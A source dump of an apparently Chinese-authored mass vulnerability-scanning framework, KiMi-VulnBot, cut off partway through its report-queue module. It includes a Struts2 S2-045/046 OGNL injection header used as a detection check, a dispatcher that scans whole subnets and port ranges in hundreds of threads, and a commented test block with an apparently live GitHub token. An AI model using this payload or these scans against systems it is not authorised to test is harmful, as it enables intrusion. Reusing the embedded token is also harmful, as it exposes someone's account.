├── KiMi_VulnBot_PoC_Plugin ├── README.md ├── __poc_tcp_scan.py └── poc_templete.py ├── github_api.py ├── local_system.py ├── poc_framework_console.py ├── poc_framework_dispatch.py ├── poc_framework_report_queue.py ├── poc_framework_scan_plugin.py ├── poc_framework_socket_pipe.py └── readme.md /KiMi_VulnBot_PoC_Plugin/README.md: -------------------------------------------------------------------------------- 1 | 2 | #### KiMi-VulnBot PoC Plugin 3 | 4 | 这是KiMi-VulnBot PoC 扫描插件目录,用于提供PoC 扫描插件到`poc_framework_scan_plugin.py` 运行
5 | 6 | 7 | #### PoC 文件命名 8 | 9 | Plugin 插件以`__poc_` 为前缀,方便于`poc_framework_scan_plugin.py` 识别扫描框架
10 | 11 | #### PoC 接口 12 | 13 | Plugin 插件接口做到尽量精减,只需要PoC Plugin 模块提供`valid_vuln()` 函数即可
14 | 15 | ```py 16 | def valid_vuln(host,port,other = {}) : 17 | # poc valid code 18 | # ... 19 | 20 | return boolen_value 21 | ``` 22 | 23 | `valid_vuln()`函数有三个参数:
24 | `host` 当前要测试的host/ip 地址
25 | `port` 当前要测试的端口
26 | `other` 拓展参数
27 | 28 | 当前目录下的`poc_temllete.py` 是关于S2-046 的扫描框架例子
29 | -------------------------------------------------------------------------------- /KiMi_VulnBot_PoC_Plugin/__poc_tcp_scan.py: -------------------------------------------------------------------------------- 1 | 2 | import random 3 | import socket 4 | 5 | 6 | def valid_vuln(host,port,other = None) : 7 | sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | result = False 9 | 10 | try : 11 | sock.settimeout(3) 12 | sock.connect((host,port)) 13 | 14 | result = True 15 | except : 16 | pass 17 | 18 | sock.close() 19 | 20 | return result 21 | 22 | 23 | if __name__ == '__main__' : # plugin debug 24 | print valid_vuln('127.0.0.1',80) 25 | print valid_vuln('127.0.0.1',135) 26 | print valid_vuln('127.0.0.1',3389) 27 | print valid_vuln('192.168.100.10',80) 28 | print valid_vuln('192.168.100.10',135) 29 | print valid_vuln('192.168.100.10',3389) 30 | -------------------------------------------------------------------------------- /KiMi_VulnBot_PoC_Plugin/poc_templete.py: -------------------------------------------------------------------------------- 1 | 2 | ''' 3 | there will import python library what you want 4 | ''' 5 | 6 | import requests 7 | 8 | ''' 9 | PoC code ,we do not care PoC's execution ,Report just care test result 10 | For example ,I try using S2-045 to make templete code 11 | ''' 12 | 13 | def s2_046(url) : 14 | output_flag = 'TEST for vuln ..' 15 | headers = { 16 | 'Content-Type' : '%{(#test="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println("' + output_flag + '")).(#ros.flush())}' 17 | } 18 | responed = requests.get(url,headers = headers) 19 | 20 | if output_flag in responed.content: 21 | return True 22 | 23 | return False 24 | 25 | ''' 26 | PoC scaner dispatch task entry function 27 | 28 | valid_vuln(host,port,other = {}) 29 | 30 | Argument 1 -- host : target host/ip 31 | Argument 2 -- port : target port 32 | Argument 3 -- other : expand arguments 33 | ''' 34 | 35 | def valid_vuln(host,port = 80,other = {}) : 36 | if other.has_key('url') : # check custom scan url 37 | url = other['url'] # using this url for scan 38 | else : 39 | url = 'http://' + host + ':' + str(port) + '/' # build scan url 40 | 41 | return s2_046(url) # try to scan 42 | -------------------------------------------------------------------------------- /github_api.py: -------------------------------------------------------------------------------- 1 | 2 | #cofing :utf-8 3 | 4 | import json 5 | import os 6 | import requests 7 | 8 | import local_system 9 | 10 | 11 | class report_tool_kit : 12 | 13 | class git_api : 14 | 15 | @staticmethod 16 | def get_auth_headers(github_authorization_key) : 17 | headers = { 18 | 'Authorization' : 'token ' + github_authorization_key 19 | } 20 | 21 | return headers 22 | 23 | @staticmethod 24 | def create_user_repository(github_repository_name,github_authorization_key,repository_description = '',repository_homepage = '') : 25 | upload_repository_attributes = { 26 | 'name' : github_repository_name , 27 | 'description' : repository_description , 28 | 'homepage' : repository_homepage , 29 | } 30 | 31 | status_code = requests.post('https://api.github.com/user/repos' , 32 | headers = report_tool_kit.git_api.get_auth_headers(github_authorization_key) , 33 | json = upload_repository_attributes 34 | ).status_code 35 | 36 | if 200 == status_code : 37 | return True 38 | 39 | return False 40 | 41 | @staticmethod 42 | def create_organization_repository(github_organization_name,github_repository_name,github_authorization_key,repository_description = '',repository_homepage = '') : 43 | upload_repository_attributes = { 44 | 'name' : github_repository_name , 45 | 'description' : repository_description , 46 | 'homepage' : repository_homepage , 47 | } 48 | 49 | status_code = requests.post('https://api.github.com/orgs/' + github_organization_name + '/repos' , 50 | headers = report_tool_kit.git_api.get_auth_headers(github_authorization_key) , 51 | json = upload_repository_attributes 52 | ).status_code 53 | 54 | if 200 == status_code : 55 | return True 56 | 57 | return False 58 | 59 | @staticmethod 60 | def delete_user_repository(github_repository_name,github_user_name,github_authorization_key) : 61 | status_code = requests.delete('https://api.github.com/repos/' + github_user_name + '/' + github_repository_name , 62 | headers = report_tool_kit.git_api.get_auth_headers(github_authorization_key) 63 | ).status_code 64 | 65 | if 204 == status_code : 66 | return True 67 | 68 | return False 69 | 70 | @staticmethod 71 | def delete_organization_repository(github_organization_name,github_repository_name,github_authorization_key) : 72 | status_code = requests.delete('https://api.github.com/repos/' + github_organization_name + '/' + github_repository_name , 73 | headers = report_tool_kit.git_api.get_auth_headers(github_authorization_key) 74 | ).status_code 75 | 76 | if 204 == status_code : 77 | return True 78 | 79 | return False 80 | 81 | class git_shell : 82 | 83 | def __init__(self,report_directory_path) : 84 | if not local_system.is_exist_directory(report_directory_path) : 85 | raise ValueError,'GitShell open unexist report_directory_path :' + report_directory_path 86 | 87 | self.report_directory_path = report_directory_path 88 | 89 | def entry_repository_directory(self) : 90 | os.chdir(self.report_directory_path) 91 | 92 | def exit_repository_directory(self) : 93 | os.chdir(local_system.get_current_path()) 94 | 95 | def init_repository_directory(self) : 96 | os.system('git init') 97 | 98 | def add_repository_all_file(self) : 99 | os.system('git add .') 100 | 101 | def add_repository_file(self,file_path) : 102 | os.system('git add ' + file_path) 103 | 104 | def commit_repository(self,commit_information = '.') : 105 | os.system('git commit -m "' + commit_information + '"') 106 | 107 | def set_remote_repository_origin(self,origin_link) : 108 | os.system('git remote add origin ' + origin_link) 109 | 110 | def set_http_remote_repository_origin_by_name(self,origin_user_or_organization_name,repository_name) : 111 | os.system('git remote add origin https://github.com/' + origin_user_or_organization_name + '/' + repository_name + '.git') 112 | 113 | def set_ssh_remote_repository_origin_by_name(self,origin_user_or_organization_name,repository_name) : 114 | os.system('git remote add origin git@github.com:' + origin_user_or_organization_name + '/' + repository_name + '.git') 115 | 116 | def push_repository(self,argument_string = '') : 117 | os.system('git push ' + argument_string) 118 | 119 | def push_to_repository_master(self,argument_string = '') : 120 | self.push_repository('-u origin master') 121 | 122 | def pull_repository_directory(self) : 123 | os.system('git pull') 124 | 125 | @staticmethod 126 | def __make_new_file(file_name,file_data = '') : 127 | file = open(file_name,'w') 128 | 129 | if not file_data == '' : 130 | file.write(file_data) 131 | 132 | file.close() 133 | 134 | 135 | @staticmethod 136 | def create_report(github_user_or_organization_name,github_authorization_key,report_name,report_description = '',report_readme_information = '',is_organization_repository = False) : 137 | if is_organization_repository : 138 | report_tool_kit.git_api.create_user_repository(report_name,github_authorization_key,report_description) 139 | else : 140 | report_tool_kit.git_api.create_organization_repository(github_user_or_organization_name, \ 141 | report_name, \ 142 | github_authorization_key, \ 143 | report_description) 144 | 145 | if not os.path.isdir(report_name) : 146 | os.mkdir(report_name) 147 | report_tool_kit.__make_new_file(report_name + '/README.md',report_readme) 148 | 149 | repository = report_tool_kit.git_shell(report_name) 150 | 151 | repository.entry_repository_directory() 152 | repository.init_repository_directory() 153 | repository.add_repository_all_file() 154 | repository.commit_repository() 155 | repository.set_ssh_remote_repository_origin_by_name(github_user_name,github_test_repository_name) 156 | repository.push_to_repository_master() 157 | repository.exit_repository_directory() 158 | 159 | @staticmethod 160 | def delete_report(github_user_or_organization_name,github_authorization_key,github_repository_name) : 161 | report_tool_kit.git_api.delete_user_repository(github_repository_name,github_user_or_organization_name,github_authorization_key) 162 | 163 | @staticmethod 164 | def upload_report(github_repository_name) : 165 | repository = report_tool_kit.git_shell(github_repository_name) 166 | 167 | repository.entry_repository_directory() 168 | repository.add_repository_all_file() 169 | repository.commit_repository() 170 | repository.push_repository() 171 | repository.exit_repository_directory() 172 | 173 | @staticmethod 174 | def update_report(github_repository_name) : 175 | repository = report_tool_kit.git_shell(github_repository_name) 176 | 177 | repository.entry_repository_directory() 178 | repository.pull_repository_directory() 179 | repository.exit_repository_directory() 180 | 181 | 182 | if __name__ == '__main__' : # test case .. 183 | ''' 184 | github_organization_name = 'KiMiThreatPerception' 185 | github_user_name = 'KiMi-VulnBot' 186 | github_authorization_key = '7292ffb88b91efd93f243a736a45d439596cd99c' 187 | github_test_repository_name = 'test'#'Hello-World' 188 | ''' 189 | # report_tool_kit.delete_report(github_user_name,github_authorization_key,github_test_repository_name) 190 | # report_tool_kit.create_report(github_user_name,github_authorization_key,github_test_repository_name,'Just Test ! ..') 191 | 192 | ''' 193 | is_create = True 194 | 195 | if not is_create : 196 | report_tool_kit.git_api.delete_user_repository(github_test_repository_name,github_user_name,github_authorization_key) 197 | else : 198 | # os.remove('test/.git') 199 | report_tool_kit.git_api.create_user_repository(github_test_repository_name,github_authorization_key,'test project..') 200 | 201 | repository = git_shell(github_test_repository_name) 202 | repository.entry_repository_directory() 203 | repository.init_repository_directory() 204 | print 'init_repository_directory' 205 | repository.add_repository_all_file() 206 | print 'add_repository_all_file' 207 | repository.commit_repository('first commit') 208 | print 'commit_repository' 209 | repository.set_ssh_remote_repository_origin_by_name(github_user_name,github_test_repository_name) 210 | print 'set_remote_repository_origin_by_name' 211 | repository.push_to_repository_master() 212 | print 'push_to_repository_master' 213 | ''' 214 | # report_tool_kit.git_api.create_user_repository(github_test_repository_name,github_authorization_key,'test') 215 | # create_organization_repository(github_organization_name,github_test_repository_name,github_authorization_key) 216 | # delete_organization_repository(github_organization_name,github_test_repository_name,github_authorization_key) 217 | 218 | # init_repository_directory('./test') 219 | -------------------------------------------------------------------------------- /local_system.py: -------------------------------------------------------------------------------- 1 | 2 | import os 3 | import platform 4 | import socket 5 | import sys 6 | import thread 7 | import threading 8 | import time 9 | 10 | 11 | def debug_print(debug_string) : 12 | print debug_string 13 | 14 | def debug_var_dump(debug_object) : 15 | print debug_object 16 | 17 | def get_timetick() : 18 | return time.time() 19 | 20 | def get_system() : 21 | system = platform.system() 22 | 23 | if 'Windows' == system : 24 | return 1 25 | if 'Linux' == system : 26 | return 2 27 | if 'MacOS' == system : 28 | return 3 29 | 30 | return 0 31 | 32 | def get_system_directory_separator() : 33 | if 1 == get_system() : 34 | return '\\' 35 | 36 | return '/' 37 | 38 | def get_current_path() : 39 | offset = sys.argv[0].rfind(get_system_directory_separator()) 40 | 41 | current_file_path = sys.argv[0][ : offset + 1] 42 | 43 | return current_file_path 44 | 45 | def get_directory_files(directory_path) : 46 | return os.listdir(directory_path) 47 | 48 | def is_exist_directory(path) : 49 | return os.path.isdir(path) 50 | 51 | def is_exist_file(path) : 52 | return os.path.isfile(path) 53 | 54 | def create_directory(path) : 55 | return os.mkdir(path) 56 | 57 | def copy_file(source_file_path,destination_file_path) : 58 | source_file_data = read_file(source_file_path) 59 | 60 | write_file(destination_file_path,source_file_data) 61 | 62 | def copy_directory(source_path,destination_path) : 63 | directory_char = get_system_directory_separator() 64 | 65 | if not is_exist_directory(destination_path) : 66 | os.mkdir(destination_path) 67 | 68 | for walk_index in os.walk(source_path) : 69 | walk_source_path = walk_index[0] 70 | 71 | first_directory_offset = walk_source_path.find(directory_char) 72 | 73 | if not -1 == first_directory_offset : 74 | copy_target_directory = destination_path + directory_char + walk_index[0][first_directory_offset + 1:] 75 | else : 76 | copy_target_directory = destination_path + directory_char 77 | 78 | if not is_exist_directory(copy_target_directory) : 79 | os.mkdir(copy_target_directory) 80 | 81 | for file_index in walk_index[2] : 82 | copy_file(walk_index[0] + directory_char + file_index,copy_target_directory + directory_char + file_index) 83 | 84 | def read_file(file_path) : 85 | file = open(file_path,'r') 86 | result = '' 87 | 88 | if file : 89 | result = file.read() 90 | 91 | file.close() 92 | 93 | return result 94 | 95 | def write_file(file_path,data) : 96 | file = open(file_path,'w') 97 | 98 | if file : 99 | file.write(data) 100 | 101 | file.close() 102 | 103 | def sleep(sleep_time) : 104 | time.sleep(sleep_time) 105 | 106 | def ip_address_to_number(ip_address) : 107 | address_number = socket.inet_aton(ip_address) 108 | 109 | return_number = ord(address_number[0]) 110 | return_number += ord(address_number[1]) * 0x100 111 | return_number += ord(address_number[2]) * 0x10000 112 | return_number += ord(address_number[3]) * 0x1000000 113 | 114 | return return_number 115 | 116 | def number_to_ip_address(number) : 117 | address_byte = '' 118 | 119 | address_byte += str((number & 0xFF)) + '.' 120 | address_byte += str((number & 0xFFFF) / 0x100) + '.' 121 | address_byte += str((number & 0xFFFFFF) / 0x10000) + '.' 122 | address_byte += str((number & 0xFFFFFFFF) / 0x1000000) 123 | 124 | return address_byte 125 | 126 | def big_endian_number_conver(number) : 127 | result = 0 128 | 129 | result += (number & 0xFF000000) / 0x1000000 130 | result += (number & 0xFF0000) / 0x100 131 | result += (number & 0xFF00) * 0x100 132 | result += (number & 0xFF) * 0x1000000 133 | 134 | return result 135 | 136 | def create_thread(thread_function,thread_arguments = (),is_sub_thread = False) : 137 | # thread.start_new_thread(thread_function,thread_arguments) 138 | thread = thread_object(thread_function,thread_arguments,is_sub_thread) 139 | 140 | thread.start() 141 | 142 | return thread 143 | 144 | class thread_object(threading.Thread) : 145 | 146 | def __init__(self,thread_function,thread_arguments = (),is_sub_thread = False) : 147 | threading.Thread.__init__(self) 148 | 149 | self.thread_function = thread_function 150 | self.thread_arguments = thread_arguments 151 | 152 | if is_sub_thread : 153 | self.setDaemon(True) 154 | 155 | def run(self) : 156 | if len(self.thread_arguments) : 157 | self.thread_function(self.thread_arguments) 158 | else : 159 | self.thread_function() 160 | 161 | def exit(self) : 162 | self._Thread__stop() 163 | 164 | class thread_lock : 165 | 166 | def __init__(self) : 167 | self.thread_lock = thread.allocate_lock() 168 | 169 | def enter_lock(self,timeout = 0) : 170 | if timeout : 171 | self.thread_lock.acquire(timeout) 172 | else : 173 | self.thread_lock.acquire() 174 | 175 | def exit_lock(self) : 176 | self.thread_lock.release() 177 | 178 | def is_lock(self) : 179 | return self.thread_lock.locked() 180 | 181 | 182 | if __name__ == '__main__' : # test case .. 183 | # copy_directory('report_templete','test') 184 | 185 | ip = '127.0.0.1' 186 | 187 | print ip_address_to_number(ip) 188 | print big_endian_number_conver(ip_address_to_number(ip)) 189 | print number_to_ip_address(big_endian_number_conver(ip_address_to_number(ip))) 190 | print big_endian_number_conver(big_endian_number_conver(ip_address_to_number(ip))) 191 | print number_to_ip_address(big_endian_number_conver(big_endian_number_conver(ip_address_to_number(ip)))) 192 | -------------------------------------------------------------------------------- /poc_framework_console.py: -------------------------------------------------------------------------------- 1 | 2 | import poc_framework_socket_pipe 3 | 4 | 5 | ''' 6 | PoC FrameWork Dispatch Console : 7 | 8 | This Console can using to manager dispatch server by administrator and distributed interface .. 9 | 10 | ''' 11 | 12 | if __name__ == '__main__' : # administrator console .. 13 | poc_framework_socket_pipe.pipe_console.init_pipe() 14 | poc_framework_socket_pipe.pipe_console.pipe_write('test_connect') 15 | 16 | welcome_string = poc_framework_socket_pipe.pipe_console.pipe_read() 17 | 18 | if not len(welcome_string) : 19 | print 'Connect to KiMi-VulnBot Dispatch Server Error ..' 20 | 21 | print welcome_string 22 | 23 | while True : 24 | command = raw_input('>').strip().lower() 25 | 26 | if 'quit'== command : 27 | print 'Console Exit ! ' 28 | 29 | break 30 | else : 31 | poc_framework_socket_pipe.pipe_console.pipe_write(command) 32 | 33 | print poc_framework_socket_pipe.pipe_console.pipe_read() 34 | 35 | else : # distributed interface .. 36 | print 'WARNING ! distributed interface will develepe ..' 37 | -------------------------------------------------------------------------------- /poc_framework_dispatch.py: -------------------------------------------------------------------------------- 1 | 2 | import local_system 3 | import poc_framework_report_queue 4 | import poc_framework_scan_plugin 5 | import poc_framework_socket_pipe 6 | 7 | 8 | class task : 9 | 10 | def __init__(self,scan_plugin_name,scan_host_session,scan_port_session = [80],max_thread_count = 600) : 11 | self.max_thread_count = max_thread_count 12 | self.current_running_thread = 0 13 | self.thread_lock = local_system.thread_lock() 14 | self.update_lock = local_system.thread_lock() 15 | self.queue_lock = local_system.thread_lock() 16 | self.scan_plugin_name = scan_plugin_name 17 | self.scan_process = 0 18 | self.scan_host_session = scan_host_session 19 | self.scan_port_session = scan_port_session 20 | self.host_session_length = len(self.scan_host_session) 21 | self.port_session_length = len(self.scan_port_session) 22 | self.task_loop = True 23 | self.wait_for_exit = True 24 | 25 | if 0 == self.port_session_length : 26 | self.port_session_length = 1 27 | 28 | self.task_count = self.host_session_length * self.port_session_length 29 | 30 | if not poc_framework_scan_plugin.is_exist_plugin(scan_plugin_name) : 31 | raise ValueError,'WARNING ! Can\'t Found the Scan Plugin :' + scan_plugin_name 32 | 33 | def get_task_name(self) : 34 | return self.scan_plugin_name 35 | 36 | def get_task_scan_process(self) : 37 | return self.scan_process 38 | 39 | def __set_task_scan_process(self,process) : 40 | self.scan_process = process 41 | 42 | def get_current_running_thread(self) : 43 | self.thread_lock.enter_lock() 44 | 45 | result = self.current_running_thread 46 | 47 | self.thread_lock.exit_lock() 48 | 49 | return result 50 | 51 | def __add_a_running_thread(self) : 52 | self.thread_lock.enter_lock() 53 | 54 | self.current_running_thread += 1 55 | 56 | self.thread_lock.exit_lock() 57 | 58 | def __remove_a_running_thread(self) : 59 | self.thread_lock.enter_lock() 60 | 61 | self.current_running_thread -= 1 62 | 63 | if self.queue_lock.is_lock() : 64 | self.queue_lock.exit_lock() # TIPS : exit queue lock at this will promoting a little performance . 65 | # look code at self.queue_lock.lock() and self.get_current_running_thread() 66 | # in __internal_task_execute_queue .. 67 | self.thread_lock.exit_lock() 68 | 69 | @staticmethod 70 | def __internal_task_thread(thread_argument_list) : 71 | self = thread_argument_list[0] 72 | vuln_name = thread_argument_list[1] 73 | target_host = thread_argument_list[2] 74 | target_port = thread_argument_list[3] 75 | 76 | # print target_host,target_port 77 | 78 | self.__add_a_running_thread() 79 | 80 | # WARNING ! There are not try-catch for capture plugin excute exception 81 | if not None == target_port : 82 | result = poc_framework_scan_plugin.call_plugin(self.scan_plugin_name,target_host,target_port) 83 | else : 84 | result = poc_framework_scan_plugin.call_plugin(self.scan_plugin_name,target_host) 85 | 86 | if result : 87 | self.update_lock.enter_lock() 88 | 89 | # site_count = poc_framework_report_queue.poc_report_cache.get_report_site_data(vuln_name) + 1 90 | print 'Live:',target_host,target_port 91 | # poc_framework_report_queue.poc_report_cache.set_report_site_data(vuln_name,site_count) 92 | 93 | self.update_lock.exit_lock() 94 | 95 | self.__remove_a_running_thread() 96 | 97 | @staticmethod 98 | def __internal_task_execute_queue(thread_argument_list) : 99 | # print 'Enter __internal_task_execute_queue' 100 | 101 | executed_task_index = 0 102 | self = thread_argument_list[0] 103 | 104 | while self.task_loop and executed_task_index < self.task_count : 105 | create_new_task_thread_count = self.max_thread_count - self.get_current_running_thread() 106 | 107 | if create_new_task_thread_count : 108 | for create_new_task_thread_index in range(create_new_task_thread_count) : 109 | target_host_index = executed_task_index / self.port_session_length 110 | target_port_index = executed_task_index % self.port_session_length 111 | 112 | # print 'Dispatch Task Index ,host:',self.scan_host_session[target_host_index], \ 113 | # 'port:',self.scan_port_session[target_port_index] 114 | 115 | local_system.create_thread(task.__internal_task_thread, 116 | (self, 117 | self.scan_plugin_name, 118 | self.scan_host_session[target_host_index], 119 | self.scan_port_session[target_port_index] 120 | ), 121 | True) # all sub-thread is daemon thread ,they will exit follow return 122 | 123 | executed_task_index += 1 124 | 125 | self.__set_task_scan_process(executed_task_index / float(self.task_count)) 126 | 127 | if executed_task_index >= self.task_count : # all task executed .. 128 | return 129 | 130 | if self.get_current_running_thread() < self.max_thread_count : 131 | continue 132 | 133 | if self.queue_lock.is_lock() : 134 | try : 135 | self.queue_lock.exit_lock() # TIPS : clear lock 136 | except : 137 | pass 138 | 139 | self.queue_lock.enter_lock() # TIPS : pre-enter deadlock 140 | 141 | self.queue_lock.enter_lock() # TIPS : wait for __remove_a_running_thread unlock until __internal_task_thread exit 142 | 143 | if self.wait_for_exit : # WARNING ! __internal_task_execute_queue() create daemon thread , 144 | # all thread will exit when __internal_task_execute_queue() return 145 | # print 'Wait For All Threads Exit ..' 146 | 147 | while self.get_current_running_thread() : 148 | self.queue_lock.lock(1) # TIPS : enter lock for check running thread list .. 149 | 150 | # print 'Exit __internal_task_execute_queue' 151 | 152 | def run(self) : 153 | self.task_loop = True 154 | self.wait_for_exit = True 155 | self.scan_process = 0 156 | 157 | local_system.create_thread(task.__internal_task_execute_queue,(self,)) 158 | 159 | def exit(self) : 160 | self.wait_for_exit = True 161 | self.task_loop = False 162 | 163 | def force_exit(self) : 164 | self.wait_for_exit = False 165 | self.task_loop = False 166 | 167 | 168 | def command_resolver(command) : 169 | command_argument_list = command.split(' ') 170 | 171 | if len(command_argument_list) : 172 | if 1 == len(command_argument_list) : 173 | return command_argument_list[0] , [] 174 | else : 175 | return command_argument_list[0] , command_argument_list[1:] 176 | 177 | return '', [] 178 | 179 | 180 | if __name__ == '__main__' : 181 | print 'Init Dispatch Server' 182 | 183 | poc_framework_socket_pipe.pipe_dispatch.init_pipe() 184 | poc_framework_report_queue.poc_report_update_queue.run_dispatch() 185 | 186 | print 'Enter Server' 187 | 188 | scan_task_list = [] 189 | 190 | while True : 191 | command,command_arguments = command_resolver(poc_framework_socket_pipe.pipe_dispatch.pipe_read()) 192 | 193 | print 'Receive Command :',command,command_arguments 194 | 195 | if len(command) : 196 | if 'test_connect' == command : 197 | poc_framework_socket_pipe.pipe_dispatch.pipe_write('There is KiMi-Bot Scan Task Dispatch Server ...') 198 | 199 | elif 'create' == command : # command format 1 : 200 | # create %vuln_name% network %network_segment% %network_mask% [%port%] (%thread%)) 201 | # %port% ===list format==> [port1,port2,lower_bound-upper_bound] 202 | # command format 2 : 203 | # create %vuln_name% host 204 | # > host 1 # input scan host list 205 | # > host 2 206 | # > ... 207 | # > port_list # conver to input scan port list 208 | # > 80 209 | # > 8080 210 | # > 10086 211 | # > submit_task # submit task for execute 212 | # command format 3 : 213 | # create %vuln_name% url 214 | # > url 1 # input scan host list 215 | # > url 2 216 | # > url 3 217 | # > ... 218 | # > submit_task # submit task for execute 219 | # 220 | vuln_name = command_arguments[0] 221 | command_format = command_arguments[1] 222 | 223 | print 'Create Task :',vuln_name,command_format 224 | 225 | if not poc_framework_scan_plugin.is_exist_plugin(vuln_name) : 226 | print vuln_name,'is invalid Plugin ..' 227 | 228 | continue 229 | 230 | if 'network' == command_format : 231 | network_segment = local_system.ip_address_to_number(command_arguments[2]) # WARNING ! big-endian 232 | network_segment = local_system.big_endian_number_conver(network_segment) 233 | network_mask = int(command_arguments[3]) # 24 234 | network_ip_count = pow(2,32 - network_mask) 235 | network_last_ip = network_segment + network_ip_count 236 | network_ip_list = [] 237 | 238 | print 'Network Session [',local_system.number_to_ip_address(network_segment), \ 239 | local_system.number_to_ip_address(network_last_ip), \ 240 | ']',str(network_ip_count) 241 | 242 | for network_index in range(network_ip_count) : 243 | network_ip_index = local_system.big_endian_number_conver(network_segment + network_index) 244 | 245 | network_ip_list.append(local_system.number_to_ip_address(network_ip_index)) 246 | 247 | if 5 <= len(command_arguments) : 248 | port_list_ = command_arguments[4] 249 | port_list_ = port_list_.replace('[','') 250 | port_list_ = port_list_.replace(']','') 251 | port_list_ = port_list_.split(',') 252 | port_list = [] 253 | 254 | if not '*' == port_list_[0] : # [*] 255 | for port_index in port_list_ : 256 | if '-' in port_index : 257 | lower_bound = port_index.split('-') 258 | upper_bound = lower_bound[1] 259 | lower_bound = lower_bound[0] 260 | 261 | if lower_bound < upper_bound : 262 | for index in range(upper_bound - lower_bound) : 263 | port_list.append(lower_bound + port_index) 264 | else : # error .. 265 | pass 266 | else : 267 | port_list.append(int(port_index)) 268 | else : 269 | for port_index in range(65532) : 270 | port_list.append(port_index) 271 | 272 | # print 'Port List:',port_list 273 | print 'Ready to Run Plugin ..' 274 | 275 | scan_task = task(vuln_name,network_ip_list,port_list) 276 | else : 277 | print 'Ready to Run Plugin ..' 278 | 279 | scan_task = task(vuln_name,network_ip_list) 280 | 281 | scan_task_list.append(scan_task) 282 | scan_task.run() 283 | 284 | elif 'host' == command_format : 285 | pass # hahahahaha .. 286 | 287 | 288 | 289 | poc_framework_socket_pipe.pipe_dispatch.pipe_write('Task is Running ..') 290 | elif 'delete' == command : # delete %vuln_name% 291 | for scan_task_index in len(scan_task_list) : 292 | scan_task_index_object = scan_task_list[scan_task_index] 293 | 294 | if not scan_task_index_object.get_task_name() == command_arguments[0] : 295 | continue 296 | 297 | if scan_task_index_object.get_current_running_thread() : 298 | poc_framework_socket_pipe.pipe_dispatch.pipe_write('Task has ' + \ 299 | str(scan_task_index_object.get_current_running_thread()) + \ 300 | ' Running ,Do You want exit ? [yes|force|no]:' 301 | ) 302 | 303 | command = poc_framework_socket_pipe.pipe_dispatch.pipe_read() 304 | 305 | if len(command) : 306 | if command.startswith('yes') : 307 | scan_task_index_object.exit() 308 | scan_task_list.pop(scan_task_index) 309 | elif command.startswith('force') : 310 | scan_task_index_object.force_exit() 311 | scan_task_list.pop(scan_task_index) 312 | 313 | break 314 | 315 | poc_framework_socket_pipe.pipe_dispatch.pipe_write('Delete Task ..') 316 | 317 | elif 'queue' == command : 318 | for scan_task_index in scan_task_list : 319 | output = scan_task_index.get_task_name() + '(' + \ 320 | + 'RunningThread:' + \ 321 | + str(get_current_running_thread) + ',' + \ 322 | + 'Progress:' + \ 323 | + str(scan_task_index.get_task_scan_process()) + ')\n' 324 | 325 | poc_framework_socket_pipe.pipe_dispatch.pipe_write(output) 326 | 327 | elif 'quit' == command : 328 | break 329 | else : 330 | poc_framework_socket_pipe.pipe_dispatch.pipe_write('Oops ,nothing ...') 331 | 332 | print 'KiMi-Bot Dispatch Server Exited' 333 | else : 334 | print 'You need Running by Python instead of Import ..' 335 | -------------------------------------------------------------------------------- /poc_framework_report_queue.py: -------------------------------------------------------------------------------- 1 | 2 | import json 3 | 4 | import github_api 5 | import local_system 6 | 7 | 8 | ''' 9 | KiMi-VulnBot github auth-key : 10 | ''' 11 | 12 | github_organization_name = 'KiMiThreatPerception' 13 | github_user_name = 'KiMi-VulnBot' 14 | github_authorization_key = '' 15 | 16 | ''' 17 | PoC Report Cache -- Save Current Report Cache 18 | ''' 19 | 20 | class poc_report_cache : 21 | 22 | __inside_cache = { 23 | 24 | } 25 | __thread_lock = local_system.thread_lock() 26 | 27 | @staticmethod 28 | def get_report_site_data(report_name,city_name) : 29 | return_data = None 30 | 31 | poc_report_cache.__thread_lock.enter_lock() 32 | 33 | if poc_report_cache.__inside_cache.has_key(report_name) : 34 | if poc_report_cache.__inside_cache.has_key[report_name]['site_data'].has_key(report_name) : 35 | return_data = poc_report_cache.__inside_cache[report_name]['site_data'][city_name] 36 | 37 | poc_report_cache.__thread_lock.exit_lock() 38 | 39 | return return_data 40 | 41 | @staticmethod 42 | def get_report_analysis_report(report_name) : 43 | return_data = None 44 | 45 | poc_report_cache.__thread_lock.enter_lock() 46 | 47 | if poc_report_cache.__inside_cache.has_key(report_name) : 48 | return_data = poc_report_cache.__inside_cache[report_name]['analysis_report'] 49 | 50 | poc_report_cache.__thread_lock.exit_lock() 51 | 52 | return return_data 53 | 54 | @staticmethod 55 | def set_report_site_data(report_name,city_name,vuln_host_number) : 56 | poc_report_cache.__thread_lock.enter_lock() 57 | 58 | if poc_report_cache.__inside_cache.has_key(report_name) : 59 | poc_report_cache.__inside_cache[report_name]['site_data'][city_name] = vuln_host_number 60 | 61 | poc_report_cache.__thread_lock.exit_lock() 62 | 63 | @staticmethod 64 | def set_report_analysis_report(report_name,analysis_report_data) : 65 | poc_report_cache.__thread_lock.enter_lock() 66 | 67 | if poc_report_cache.__inside_cache.has_key(report_name) : 68 | poc_report_cache.__inside_cache[report_name]['analysis_report'] = analysis_report_data 69 | 70 | poc_report_cache.__thread_lock.exit_lock() 71 | 72 | @staticmethod 73 | def clear_report_site_data(report_name) : 74 | poc_report_cache.__thread_lock.enter_lock() 75 | 76 | if poc_report_cache.__inside_cache.has_key(report_name) : 77 | poc_report_cache.__inside_cache[report_name]['site_data'] = {} 78 | 79 | poc_report_cache.__thread_lock.exit_lock() 80 | 81 | @staticmethod 82 | def clear_analysis_report(report_name) : 83 | poc_report_cache.__thread_lock.enter_lock() 84 | 85 | if poc_report_cache.__inside_cache.has_key(report_name) : 86 | poc_report_cache.__inside_cache[report_name]['analysis_report'] = {} 87 | 88 | poc_report_cache.__thread_lock.exit_lock() 89 | 90 | @staticmethod 91 | def is_exist_report(report_name) : 92 | poc_report_cache.__thread_lock.enter_lock() 93 | 94 | result = poc_report_cache.__inside_cache.has_key(report_name) 95 | 96 | poc_report_cache.__thread_lock.exit_lock() 97 | 98 | return result 99 | 100 | @staticmethod 101 | def add_report(report_name) : 102 | poc_report_cache.__thread_lock.enter_lock() 103 | 104 | poc_report_cache.__inside_cache[report_name] = {} 105 | 